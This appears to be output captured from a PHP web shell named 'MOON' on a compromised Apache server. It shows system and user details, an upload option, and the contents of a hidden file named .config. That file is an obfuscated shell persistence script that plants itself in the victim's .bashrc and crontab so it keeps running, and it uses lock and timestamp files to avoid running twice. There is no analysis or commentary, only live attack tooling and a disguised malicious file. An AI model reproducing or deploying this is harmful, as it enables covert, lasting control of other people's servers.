MOON
Server: Apache
System: Linux server.royaltuning.hu 4.18.0-425.13.1.el8_7.x86_64 #1 SMP Tue Feb 21 04:20:52 EST 2023 x86_64
User: royaltuning (1001)
PHP: 8.2.30
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/royaltuning/.local/lib/.config
_r5eh="/tmp/.config-$(id -u)"
[ -f "$_r5eh" ] && exit 0
echo $$ > "$_r5eh" 2>/dev/null
trap "rm -f \"$_r5eh\"" EXIT
_2qoy="/home/royaltuning/.local/lib/.ts"
_miuh=$(date +%s 2>/dev/null || echo 0)
if [ -f "$_2qoy" ]; then
  read -r _cjr6 < "$_2qoy" 2>/dev/null || _cjr6=0
  _qmbq=$(( _miuh - _cjr6 ))
  [ "$_qmbq" -lt 43200 ] && exit 0
fi
_izds=".local/lib/.config"
if ! grep -q "$_izds" "$HOME/.bashrc" 2>/dev/null; then
  printf '\n([ -x "%s" ] && "%s") >/dev/null 2>&1 &\n' "/home/royaltuning/.local/lib/.config" "/home/royaltuning/.local/lib/.config" >> "$HOME/.bashrc" 2>/dev/null
fi
if command -v crontab >/dev/null 2>&1; then
  if ! crontab -l 2>/dev/null | grep -q "$_izds"; then
    _h1k0=$(crontab -l 2>/dev/null || true)
    printf '%s\n@daily %s >/dev/null 2>&1\n' "$_h1k0" "/home/royaltuning/.local/lib/.config" | crontab - 2>/dev/null
  fi
fi
echo "$_miuh" > "$_2qoy" 2>/dev/null